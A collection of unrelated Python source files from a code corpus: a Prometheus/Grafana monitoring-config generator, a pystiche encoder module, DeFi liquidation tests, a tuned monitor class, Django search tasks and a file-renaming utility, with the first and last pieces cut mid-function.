io_write_query = "irate(node_disk_writes_completed_total{{instance=\"{ip}:9100\", job=\"{job_name}\"}}[5m])".format(
ip=ip, job_name=job_name)
title_chart = "DISK IO - "
data_part_json["targets"][0].update({"expr": io_read_query})
data_part_json["targets"][1].update({"expr": io_write_query})
else:
pass
# set panel title
data_part_json["title"] = title_chart + ip
return data_part_json
# create grafana network metric config file
def create_grafana_network_panel_config(mode, ind, ip, part_index, shard, dict_part_temp_json):
data_part_json = {}
title_chart = ""
# FIRST COLUMN - NETWORK Monitoring
if part_index == 0:
# load net metric template
data_part_json = copy.deepcopy(dict_part_temp_json["net"])
# add an alert for network traffic
if ind == "service":
data_part_json["alert"][
"message"] = "the network traffic of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the network traffic of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
# no need alert network
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
network_incoming_query = "rate(node_network_receive_bytes_total{{instance" \
"=\"{ip}:9100\", job=\"{shard}\", device=\"eth0\"}}[5m]) / 1024".format(ip=ip,
shard=shard)
network_outgoing_query = "rate(node_network_transmit_bytes_total{{instance" \
"=\"{ip}:9100\", job=\"{shard}\", device=\"eth0\"}}[5m]) / 1024".format(ip=ip,
shard=shard)
title_chart = "NETWORK TRAFFIC - "
data_part_json["targets"][0].update({"expr": network_incoming_query})
data_part_json["targets"][1].update({"expr": network_outgoing_query})
# SECOND COLUMN - RAM Monitoring
elif part_index == 1:
# load tcp metric template
data_part_json = copy.deepcopy(dict_part_temp_json["tcp"])
tcp_alloc = "node_sockstat_TCP_alloc{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
tcp_inuse = "node_sockstat_TCP_inuse{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
tcp_mem = "node_sockstat_TCP_mem{{instance=\"{ip}:9100\",job=\"{shard}\"}}".format(ip=ip, shard=shard)
title_chart = "TCP SOCK - "
data_part_json["targets"][0].update({"expr": tcp_alloc})
data_part_json["targets"][1].update({"expr": tcp_inuse})
data_part_json["targets"][2].update({"expr": tcp_mem})
else:
pass
# set panel title
data_part_json["title"] = title_chart + ip
return data_part_json
# create prometheus whole config file
def create_prometheus_config(mode, dict_ip_array, dict_service_ip_array, config_template):
total_config_part_count = len(config_template["scrape_configs"])
# create network nodes
for ind in range(shard_count):
# find config part index
job_name = "shard{shard_index}_{mode}".format(shard_index=ind, mode=mode)
for part_index in range(total_config_part_count):
if job_name == config_template["scrape_configs"][part_index]["job_name"]:
ip_array = dict_ip_array.get(ind)
ip_array_size = len(ip_array)
targets = []
for idx in range(ip_array_size):
ip = ip_array[idx].rstrip()
if ip == "":
continue
targets.append(ip + ":9100")
config_template["scrape_configs"][part_index]["scrape_interval"] = str(prometheus_scrape_interval) + "s"
config_template["scrape_configs"][part_index]["static_configs"][0]["targets"] = targets
break
# create service nodes
if mode == "mainnet":
service_ips = []
for service_name in service_list:
ip_array = dict_service_ip_array.get(service_name)
ip_array_size = len(ip_array)
for idx in range(ip_array_size):
ip = ip_array[idx].rstrip()
if ip == "":
continue
service_ips.append(ip + ":9100")
service_job_name = "service_{mode}".format(mode=mode)
for part_index in range(total_config_part_count):
if service_job_name == config_template["scrape_configs"][part_index]["job_name"]:
config_template["scrape_configs"][part_index]["scrape_interval"] = str(prometheus_scrape_interval) + "s"
config_template["scrape_configs"][part_index]["static_configs"][0]["targets"] = service_ips
break
with open("prometheus/prometheus.yml", 'w') as fp:
yaml.dump(config_template, fp)
# update prometheus config
def update_prometheus_config():
cmd = "sudo cp prometheus/prometheus.yml /etc/prometheus/prometheus.yml && sudo systemctl restart prometheus"
shcmd(cmd)
# update grafana config
def update_grafana_config(mode, category, dict_shard_dashboard_json, dict_service_dashboard_json, grafana_token):
# update network nodes
for index in range(shard_count):
# get now dashboard version
url = grafana_api_host + "dashboards/uid/{mode}_shard{shard_index}_{category}".format(mode=mode,
shard_index=index,
category=category)
headers = {"Authorization": "Bearer " + grafana_token}
response = requests.get(url, headers=headers).json()
# check new dashboard
if "dashboard" in response:
version = response["dashboard"]["version"]
else:
version = 1
# post new dashboard config
dict_shard_dashboard_json[index]["version"] = version
new_dashboard_config = {
"dashboard": dict_shard_dashboard_json[index],
"folderId": dict_grafana_folder_mode[mode],
"overwrite": False
}
url = grafana_api_host + "dashboards/db"
headers = {"Authorization": "Bearer " + grafana_token, "Content-Type": "application/json"}
response = requests.post(url, data=json.dumps(new_dashboard_config), headers=headers).json()
if response["status"] == "success":
logging.info("update grafana dashboard config success for " + response["uid"])
else:
logging.error("failed to update grafana dashboard config: " + json.dumps(response))
# update service nodes
# get now dashboard version
url = grafana_api_host + "dashboards/uid/{mode}_service_{category}".format(mode=mode, category=category)
headers = {"Authorization": "Bearer " + grafana_token}
response = requests.get(url, headers=headers).json()
# check new dashboard
if "dashboard" in response:
version = response["dashboard"]["version"]
else:
version = 1
# post new dashboard config
dict_service_dashboard_json["version"] = version
new_dashboard_config = {
"dashboard": dict_service_dashboard_json,
"folderId": dict_grafana_folder_mode[mode],
"overwrite": False
}
url = grafana_api_host + "dashboards/db"
headers = {"Authorization": "Bearer " + grafana_token, "Content-Type": "application/json"}
response = requests.post(url, data=json.dumps(new_dashboard_config), headers=headers).json()
if response["status"] == "success":
logging.info("update grafana dashboard config success for " + response["uid"])
else:
logging.error("failed to update grafana dashboard config: " + json.dumps(response))
def main():
global min_storage_space, prometheus_scrape_interval, shard_count, grafana_api_host, max_actual_usage_memory_rate, do_node_ips
logging.basicConfig(level=10, format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
# get config by .env file
load_dotenv(find_dotenv())
min_storage_space = os.getenv("MIN_STORAGE_SPACE")
max_actual_usage_memory_rate = os.getenv("MAX_ACTUAL_USAGE_MEMORY_RATE")
prometheus_scrape_interval = os.getenv("PROMETHEUS_SCRAPE_INTERVAL")
# get private github token
git_token = os.getenv("GIT_TOKEN")
# get grafana api token
grafana_token = os.getenv("GRAFANA_TOKEN")
grafana_api_host = os.getenv("GRAFANA_API_HOST")
if git_token == "" or grafana_token == "":
raise RuntimeError("need to set token")
# load grafana metric template files
dict_part_temp_json = {
"cpu": load_file_to_json("grafana_template/cpu_template.json"),
"ram": load_file_to_json("grafana_template/ram_template.json"),
"disk": load_file_to_json("grafana_template/disk_space_template.json"),
"io": load_file_to_json("grafana_template/disk_io_count_template.json"),
"net": load_file_to_json("grafana_template/net_traffic_template.json"),
"tcp": load_file_to_json("grafana_template/net_sock_tcp_template.json"),
}
# get script run mode
parser = argparse.ArgumentParser()
parser.add_argument('-m', type=str, help="select run mode. mainnet ostn stn etc.")
args = parser.parse_args()
if args.m not in ["all", "mainnet", "testnet", "test"]:
raise RuntimeError("need to set correct network mode")
elif args.m == "all":
run_modes = ["mainnet", "testnet"]
else:
run_modes = [args.m]
# update for each mode network
for mode in run_modes:
# special shard count for stn & test
if mode in ["test"]:
shard_count = 1
else:
shard_count = 4
# get latest node ips from github
download_ip_list_from_github(git_token, mode)
logging.info('download ip list success')
dict_ip_array = {}
dict_dns_ip_array = {}
dict_exp_ip_array = {}
dict_service_ip_array = {}
# load grafana dashboard template files
file_path = "grafana_template/dashboard_template.json"
dashboard_template_json = load_file_to_json(file_path)
# load latest node ip files
for index in range(shard_count):
file_path = "ips/{mode}/shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_ip_array[index] = load_file_to_array(file_path)
if mode == "mainnet":
# load latest dns node ip files
for index in range(shard_count):
file_path = "ips/{mode}/dns.shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_dns_ip_array[index] = load_file_split_to_array(file_path)
# load latest exp node ip files
for index in range(shard_count):
file_path = "ips/{mode}/exp.shard{shard_index}.txt".format(shard_index=index, mode=mode)
dict_exp_ip_array[index] = load_file_to_array(file_path)
# load service ip files
for service_name in service_list:
file_path = "ips/{mode}/services/{service_name}.txt".format(service_name=service_name, mode=mode)
dict_service_ip_array[service_name] = load_file_to_array(file_path)
# load DO node
file_path = "ips/mainnet/do.mainnet.nodes.txt"
do_node_ips = load_file_to_array(file_path)
# load prometheus config template
if os.path.exists("prometheus/prometheus.yml"):
prometheus_config_template = load_file_to_yaml("prometheus/prometheus.yml")
else:
prometheus_config_template = load_file_to_yaml("prometheus_template/prometheus.yml")
# create prometheus whole config file
create_prometheus_config(mode, dict_ip_array, dict_service_ip_array, prometheus_config_template)
logging.info('create prometheus config success')
for category in ["base", "network"]:
# create grafana whole config file
dict_shard_dashboard_json = create_network_node_grafana_config(mode, category, dict_ip_array,
dict_dns_ip_array,
dashboard_template_json,
dict_part_temp_json)
dict_service_dashboard_json = create_service_grafana_config(mode, category, dict_service_ip_array,
dashboard_template_json,
dict_part_temp_json)
logging.info('create network and service node grafana config success')
# update grafana config
update_grafana_config(mode, category, dict_shard_dashboard_json, dict_service_dashboard_json, grafana_token)
logging.info('update grafana config success')
# update prometheus config and restart service
update_prometheus_config()
logging.info('update prometheus config success')
if __name__ == "__main__":
main()
|
457435
|
import warnings
from collections import OrderedDict, defaultdict
from typing import (
Any,
Callable,
Collection,
DefaultDict,
Dict,
Iterable,
List,
Optional,
Sequence,
Set,
Tuple,
cast,
)
import torch
from torch import nn
import pystiche
from ..misc import build_deprecation_message
from .encoder import Encoder
from .guides import propagate_guide
__all__ = ["MultiLayerEncoder", "SingleLayerEncoder"]
class _Layers:
def __init__(self, modules: Dict[str, nn.Module]) -> None:
self._modules = modules
def __contains__(self, name: str) -> bool:
return name in self._modules
def __len__(self) -> int:
return len(self._modules)
@property
def _names(self) -> Tuple[str, ...]:
# TODO: Check if tuple generation is expensive. If that is the case, cache it
# based on self._modules.keys()
return tuple(self._modules.keys())
def _name_to_idx(self, name: str) -> int:
if name not in self:
raise ValueError
return self._names.index(name)
def _idx_to_name(self, idx: int) -> str:
if not (0 <= idx < len(self)):
raise ValueError
return self._names[idx]
def range(
self,
start: Optional[str] = None,
stop: Optional[str] = None,
include_start: bool = True,
include_stop: bool = True,
) -> Tuple[str, ...]:
if not (start or stop):
return self._names
if start is None:
start_idx = 0
else:
start_idx = self._name_to_idx(start)
if not include_start:
start_idx += 1
if stop is None:
stop_idx = len(self)
else:
stop_idx = self._name_to_idx(stop)
if include_stop:
stop_idx += 1
return self._names[start_idx:stop_idx]
def _depth(
self, names: Iterable[str], extractor: Callable[[List[int]], int]
) -> str:
return self._idx_to_name(extractor([self._name_to_idx(name) for name in names]))
def shallowest(self, names: Optional[Iterable[str]] = None) -> str:
return self._depth(names or self._names, min)
def deepest(self, names: Optional[Iterable[str]] = None) -> str:
return self._depth(names or self._names, max)
def _neighbour(
self,
name: str,
names: Iterable[str],
edge_idx: int,
extractor: Callable[[int, List[int]], Optional[str]],
) -> Optional[str]:
if not names:
return None
idx = self._name_to_idx(name)
idcs = [self._name_to_idx(name) for name in names]
if edge_idx in idcs:
return self._idx_to_name(edge_idx)
return extractor(idx, idcs)
def _extract_prev(self, idx: int, idcs: List[int]) -> Optional[str]:
candidates = [other_idx for other_idx in idcs if other_idx < idx]
if not candidates:
return None
return self._idx_to_name(max(candidates))
def prev(self, name: str, names: Iterable[str]) -> Optional[str]:
return self._neighbour(name, names, edge_idx=0, extractor=self._extract_prev)
def _extract_next(self, idx: int, idcs: List[int]) -> Optional[str]:
candidates = [other_idx for other_idx in idcs if other_idx > idx]
if not candidates:
return None
return self._idx_to_name(min(candidates))
def next(self, name: str, names: Collection[str]) -> Optional[str]:
return self._neighbour(
name, names, edge_idx=len(self) - 1, extractor=self._extract_next
)
class MultiLayerEncoder(pystiche.Module):
r"""Sequential encoder with convenient access to intermediate layers.
Args:
modules: Named modules that serve as basis for the encoding.
Attributes:
registered_layers: Layers, on which the encodings will be cached during the
:meth:`forward` pass.
"""
_modules: Dict[str, nn.Module] # type: ignore[assignment]
def __init__(self, modules: Sequence[Tuple[str, nn.Module]]) -> None:
super().__init__(named_children=modules)
self._layers: _Layers = _Layers(self._modules)
self.registered_layers: Set[str] = set()
self._cache: DefaultDict[torch.Tensor, Dict[str, torch.Tensor]] = defaultdict(
lambda: {}
)
def __contains__(self, layer: str) -> bool:
r"""Is the layer part of the multi-layer encoder?
Args:
layer: Layer to be checked.
"""
return layer in self._layers
def verify(self, layer: str) -> None:
r"""Verifies that a layer is part of the multi-layer encoder.
Args:
layer: Layer to be checked.
Raises:
ValueError: If ``layer`` is not part of the multi-layer encoder.
"""
if layer not in self:
raise ValueError(f"Layer {layer} is not part of {type(self).__name__}().")
def register_layer(self, layer: str) -> None:
r"""Register a layer for caching the encodings in the :meth:`forward` pass.
Args:
layer: Layer to be registered.
"""
self.verify(layer)
self.registered_layers.add(layer)
# FIXME: could this be moved into pystiche.Module?
def __call__(self, *args: Any, **kwargs: Any) -> Any:
r"""Invokes :meth:`forward`."""
return super().__call__(*args, **kwargs)
def forward(
self,
input: torch.Tensor,
layer: Optional[str] = None,
cache: Optional[Dict[str, torch.Tensor]] = None,
to_cache: Optional[Collection[str]] = None,
) -> torch.Tensor:
r"""Encode the input.
Args:
input: Input to be encoded.
layer: Layer on which the ``input`` should be encoded. If omitted, defaults
to the last layer in the multi-layer encoder.
cache: Encoding cache. If omitted, defaults to the the internal cache.
to_cache: Layers, of which the encodings should be cached. If omitted,
defaults to :attr:`registered_layers`.
Examples:
>>> modules = [("conv", nn.Conv2d(3, 3, 3)), ("pool", nn.MaxPool2d(2))]
>>> mle = pystiche.enc.MultiLayerEncoder(modules)
>>> input = torch.rand(1, 3, 128, 128)
>>> output = mle(input, "conv")
"""
if layer is None:
layer = tuple(self._modules.keys())[-1]
else:
self.verify(layer)
if cache is None:
cache = self._cache[input]
if input.requires_grad:
input.register_hook(lambda grad: self.clear_cache())
if layer in cache:
return cache[layer]
if to_cache is None:
to_cache = self.registered_layers
prev = self._layers.prev(layer, cache.keys())
if prev is not None:
input = cache[prev]
for name in self._layers.range(prev, layer, include_start=False):
module = self._modules[name]
input = module(input)
if name in to_cache:
cache[name] = input
return input
def clear_cache(self) -> None:
r"""Clear the internal cache."""
self._cache.clear()
def empty_storage(self) -> None:
msg = build_deprecation_message(
"The method 'empty_storage'", "1.0", info="It was renamed to 'clear_cache'."
)
warnings.warn(msg)
self.clear_cache()
def encode(
self, input: torch.Tensor, layers: Sequence[str],
) -> Tuple[torch.Tensor, ...]:
r"""Encode the input on layers.
Args:
input: Input to be encoded.
layers: Layers on which the ``input`` should be encoded.
"""
cache: Dict[str, torch.Tensor] = {}
return tuple(
self(input, layer, cache=cache, to_cache=layers) for layer in layers
)
def propagate_guide(
self,
guide: torch.Tensor,
layers: Sequence[str],
method: str = "simple",
allow_empty: bool = False,
) -> Tuple[torch.Tensor, ...]:
r"""Propagate the guide on the given layers.
Args:
guide: Guide.
layers: Layers.
allow_empty: If ``True``, allow the propagated guides to become empty.
Defaults to ``False``.
Returns:
Tuple of guides which order corresponds to ``layers``.
"""
guides = {}
for name in self._layers.range(stop=self._layers.deepest(layers)):
module = self._modules[name]
try:
guide = guides[name] = propagate_guide(
module, guide, method=method, allow_empty=allow_empty
)
except RuntimeError as error:
# TODO: customize error message to better reflect which layer causes
# the problem
raise error
return tuple(guides[name] for name in layers)
def trim(self, layers: Optional[Iterable[str]] = None) -> None:
if layers is None:
layers = self.registered_layers
else:
for name in layers:
self.verify(name)
for name in self._layers.range(
self._layers.deepest(layers), include_start=False
):
del self._modules[name]
def extract_encoder(self, layer: str) -> "SingleLayerEncoder":
r"""Extract a :class:`SingleLayerEncoder` for the layer and register it.
Args:
layer: Layer.
"""
self.register_layer(layer)
return SingleLayerEncoder(self, layer)
class SingleLayerEncoder(Encoder):
r"""Encoder extracted from a :class:`MultiLayerEncoder` that operates on a single
layer. Invokes :meth:`SingleLayerEncoder.forward` if called.
Attributes:
multi_layer_encoder: Corresponding multi-layer encoder.
layer: Encoding layer.
"""
def __init__(self, multi_layer_encoder: MultiLayerEncoder, layer: str):
super().__init__()
self.multi_layer_encoder = multi_layer_encoder
self.layer = layer
def forward(self, input: torch.Tensor) -> torch.Tensor:
r"""Encode the given input on :attr:`SingleLayerEncoder.layer` of
:attr:`SingleLayerEncoder.multi_layer_encoder`.
Args:
input_image: Input image.
"""
return cast(torch.Tensor, self.multi_layer_encoder(input, self.layer))
def propagate_guide(self, guide: torch.Tensor) -> torch.Tensor:
r"""Propagate the given guide on :attr:`SingleLayerEncoder.layer` of
:attr:`SingleLayerEncoder.multi_layer_encoder`.
Args:
guide: Guide.
"""
return self.multi_layer_encoder.propagate_guide(guide, layers=(self.layer,))[0]
def __repr__(self) -> str:
name = self.multi_layer_encoder.__class__.__name__
properties = OrderedDict()
properties["layer"] = self.layer
properties.update(self.multi_layer_encoder.properties())
named_children = ()
return self._build_repr(
name=name, properties=properties, named_children=named_children
)
|
457455
|
from deficrawler.lending import Lending
def test_liquidation_aave_2_eth():
aave = Lending(protocol="Aave", chain="Ethereum", version=2)
liquidations = aave.get_data_from_date_range(
'21/04/2021 05:20:01', '22/04/2021 06:22:01', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_eth_user():
aave = Lending(protocol="Aave", chain="Ethereum", version=2)
liquidations = aave.get_data_from_date_range(
'21/04/2021 05:20:01', '24/04/2021 06:22:01', "liquidation", "0xcfd873f19a86b84cfc4916e8623f2486dc83d792")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xcfd873f19a86b84cfc4916e8623f2486dc83d792")
def test_liquidation_aave_2_polygon():
aave = Lending(protocol="Aave", chain="Polygon", version=2)
liquidations = aave.get_data_from_date_range(
'10/05/2021 00:00:01', '11/05/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Polygon")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_avalanche():
aave = Lending(protocol="Aave", chain="Avalanche", version=2)
liquidations = aave.get_data_from_date_range(
'10/10/2021 00:00:01', '18/10/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Aave")
assert(liquidations[0]['chain'] == "Avalanche")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(liquidations[0]['amount_principal'] > 0)
assert(liquidations[0]['amount_collateral'] > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_aave_2_polygon_user():
aave = Lending(protocol="Aave", chain="Polygon", version=2)
liquidations = aave.get_data_from_date_range(
'10/05/2021 00:00:01', '14/05/2021 00:01:10', "liquidation", "0x573bcd1d82b5bb799c5340e8f7077a4676f95097")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0x573bcd1d82b5bb799c5340e8f7077a4676f95097")
def test_liquidation_compound_2_eth():
compound = Lending(protocol="Compound", chain="Ethereum", version=2)
liquidations = compound.get_data_from_date_range(
'09/05/2021 00:00:01', '11/05/2021 00:01:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Compound")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_compound_2_eth_user():
compound = Lending(protocol="Compound", chain="Ethereum", version=2)
liquidations = compound.get_data_from_date_range(
'09/05/2021 00:00:01', '14/05/2021 00:01:10', "liquidation", "0xa507b355d6288a232ac692dad36af80ff1eba062")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xa507b355d6288a232ac692dad36af80ff1eba062")
def test_liquidation_cream_2_eth():
cream = Lending(protocol="Cream", chain="Ethereum", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '12/05/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "Ethereum")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_polygon():
cream = Lending(protocol="Cream", chain="Polygon", version=2)
liquidations = cream.get_data_from_date_range(
'25/09/2021 00:00:01', '26/09/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "Polygon")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_eth_user():
cream = Lending(protocol="Cream", chain="Ethereum", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '14/05/2021 11:54:10', "liquidation","0xcb774b92587f1c19e960eaeb6902d97e2cabd6be")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0xcb774b92587f1c19e960eaeb6902d97e2cabd6be")
def test_liquidation_cream_2_bsc():
cream = Lending(protocol="Cream", chain="bsc", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '12/05/2021 11:54:10', "liquidation")
assert(liquidations[0]['tx_id'] != "")
assert(liquidations[0]['protocol'] == "Cream")
assert(liquidations[0]['chain'] == "bsc")
assert(liquidations[0]['version'] == 2)
assert(liquidations[0]['user'] != "")
assert(liquidations[0]['token_principal'] != "")
assert(liquidations[0]['token_collateral'] != "")
assert(float(liquidations[0]['amount_principal']) > 0)
assert(float(liquidations[0]['amount_collateral']) > 0)
assert(liquidations[0]['liquidator'] != "")
assert(liquidations[0]['timestamp'] > 0)
def test_liquidation_cream_2_bsc_user():
cream = Lending(protocol="Cream", chain="bsc", version=2)
liquidations = cream.get_data_from_date_range(
'01/05/2021 00:00:01', '14/05/2021 11:54:10', "liquidation", "0x0825602e9d177b51af7d79acbdc68a746bc41ce4")
for liquidation in liquidations:
assert(liquidation['user'] ==
"0x0825602e9d177b51af7d79acbdc68a746bc41ce4")
|
457460
|
from utils import registry
DATASETS = registry.Registry('dataset')
def build_dataset_from_cfg(cfg, default_args = None):
"""
Build a dataset, defined by `dataset_name`.
Args:
cfg (eDICT):
Returns:
Dataset: a constructed dataset specified by dataset_name.
"""
return DATASETS.build(cfg, default_args = default_args)
|
457543
|
import tuned.logs
log = tuned.logs.get()
__all__ = ["Monitor"]
class Monitor(object):
"""
Base class for all monitors.
Monitors provide data about the running system to Plugin objects, which use the data
to tune system parameters.
Following methods require reimplementation:
- _init_available_devices(cls)
- update(cls)
"""
# class properties
@classmethod
def _init_class(cls):
cls._class_initialized = False
cls._instances = set()
cls._available_devices = set()
cls._updating_devices = set()
cls._load = {}
cls._init_available_devices()
assert isinstance(cls._available_devices, set)
cls._class_initialized = True
log.debug("available devices: %s" % ", ".join(cls._available_devices))
@classmethod
def _init_available_devices(cls):
raise NotImplementedError()
@classmethod
def _update_available_devices(cls):
cls._init_available_devices()
log.debug("available devices updated to: %s"
% ", ".join(cls._available_devices))
@classmethod
def get_available_devices(cls):
return cls._available_devices
@classmethod
def update(cls):
raise NotImplementedError()
@classmethod
def _register_instance(cls, instance):
cls._instances.add(instance)
@classmethod
def _deregister_instance(cls, instance):
cls._instances.remove(instance)
@classmethod
def _refresh_updating_devices(cls):
new_updating = set()
for instance in cls._instances:
new_updating |= instance.devices
cls._updating_devices.clear()
cls._updating_devices.update(new_updating)
@classmethod
def instances(cls):
return cls._instances
# instance properties
def __init__(self, devices = None):
if not hasattr(self, "_class_initialized"):
self._init_class()
assert hasattr(self, "_class_initialized")
self._register_instance(self)
if devices is not None:
self.devices = devices
else:
self.devices = self.get_available_devices()
self.update()
def __del__(self):
try:
self.cleanup()
except:
pass
def cleanup(self):
self._deregister_instance(self)
self._refresh_updating_devices()
@property
def devices(self):
return self._devices
@devices.setter
def devices(self, value):
new_devices = self._available_devices & set(value)
self._devices = new_devices
self._refresh_updating_devices()
def add_device(self, device):
assert (isinstance(device,str) or isinstance(device,unicode))
self._update_available_devices()
if device in self._available_devices:
self._devices.add(device)
self._updating_devices.add(device)
def remove_device(self, device):
assert (isinstance(device,str) or isinstance(device,unicode))
if device in self._devices:
self._devices.remove(device)
self._updating_devices.remove(device)
def get_load(self):
return dict([dev_load for dev_load in list(self._load.items()) if dev_load[0] in self._devices])
def get_device_load(self, device):
return self._load.get(device, None)
|
457579
|
import warnings
from typing import Dict, Type
from ..core.builder import DatasetBuilder
from ...serializers.event import EventDataSerializer, StatsBombSerializer
# 3749133 / 38412
class Statsbomb(DatasetBuilder):
def get_dataset_urls(self, **kwargs) -> Dict[str, str]:
warnings.warn(
"\n\nYou are about to use StatsBomb public data."
"\nBy using this data, you are agreeing to the user agreement. "
"\nThe user agreement can be found here: https://github.com/statsbomb/open-data/blob/master/LICENSE.pdf"
"\n"
)
match_id = kwargs.get("match_id", "15946")
return {
"event_data": f"https://raw.githubusercontent.com/statsbomb/open-data/master/data/events/{match_id}.json",
"lineup_data": f"https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups/{match_id}.json",
}
def get_serializer_cls(self) -> Type[EventDataSerializer]:
return StatsBombSerializer
|
457587
|
import numpy as np
import numpy.random as rnd
from libtlda.rba import RobustBiasAwareClassifier
def test_init():
"""Test for object type."""
clf = RobustBiasAwareClassifier()
assert type(clf) == RobustBiasAwareClassifier
assert not clf.is_trained
def test_fit():
"""Test for fitting the model."""
X = rnd.randn(10, 2)
y = np.hstack((np.zeros((5,)), np.ones((5,))))
Z = rnd.randn(10, 2) + 1
clf = RobustBiasAwareClassifier()
clf.fit(X, y, Z)
assert clf.is_trained
def test_predict():
"""Test for making predictions."""
X = rnd.randn(10, 2)
y = np.hstack((np.zeros((5,)), np.ones((5,))))
Z = rnd.randn(10, 2) + 1
clf = RobustBiasAwareClassifier()
clf.fit(X, y, Z)
u_pred = clf.predict(Z)
labels = np.unique(y)
assert len(np.setdiff1d(np.unique(u_pred), labels)) == 0
|
457589
|
myvar = {1:10,2:20}
class myclass():
def __init__(self):
myvar[1]=100
print myvar
self.printvar()
def printvar(self):
print myvar
k = myclass()
|
457625
|
import logging
from django_elasticsearch_dsl.registries import registry
from django.apps import apps
from froide.celery import app as celery_app
logger = logging.getLogger(__name__)
def get_instance(model_name, pk):
model = apps.get_model(model_name)
try:
return model._default_manager.get(pk=pk)
except model.DoesNotExist:
return None
@celery_app.task
def search_instance_save(model_name, pk):
instance = get_instance(model_name, pk)
if instance is None:
return
try:
registry.update(instance)
registry.update_related(instance)
except Exception as e:
logger.exception(e)
@celery_app.task
def search_instance_pre_delete(model_name, pk):
instance = get_instance(model_name, pk)
if instance is None:
return
try:
registry.delete_related(instance)
except Exception as e:
logger.exception(e)
@celery_app.task
def search_instance_delete(model_name, pk):
if pk is None:
return
model = apps.get_model(model_name)
instance = model()
instance.pk = pk
instance.id = pk
registry.delete(instance, raise_on_error=False)
|
457626
|
import os, urllib, sys, getopt
class Renamer:
input_encoding = ""
output_encoding = ""
path = ""
is_url = False
def __init__(self, input, output, path, is_url):
self.input_encoding = input
self.output_encoding = output
self.path = path
self.is_url = is_url
def start(self):
self.rename_dir(self.path)
def rename(self, root, path):
try:
if self.is_url:
new = urllib.unquote(path).decode(self.input_encoding).encode(self.output_encoding)
else:
new = path.decode(self.input_encoding).encode(self.output_encoding)
os.rename(os.path.join(root, path), os.path.join(root, new))
except:
pass
def rename_dir(self, path):
for root, dirs, files in os.walk(path):
for f in files:
self.rename(root, f)
if dirs == []:
for f in files:
self.rename(root, f)
else:
for d in dirs:
self.rename_dir(os.path.join(root, d))
self.rename(root, d)
def usage():
print '''This program can change encode of files or directories.
Usage: rename.exe [OPTION]...
Options:
-h, --help this document.
-i, --input-encoding=ENC set original encoding, default is UTF-8.
-o, --output-encoding=ENC set output encoding, default is GBK.
-p, --path=PATH choose the path which to process.
-u, --is-url whether as a URL
'''
def main(argv):
input_encoding = "utf-8"
output_encoding = "gbk"
path = ""
is_url = True
try:
opts, args = getopt.getopt(argv, "hi:o:p:u", ["help", "input-encoding=", "output-encoding=", "path=", "is-url"])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
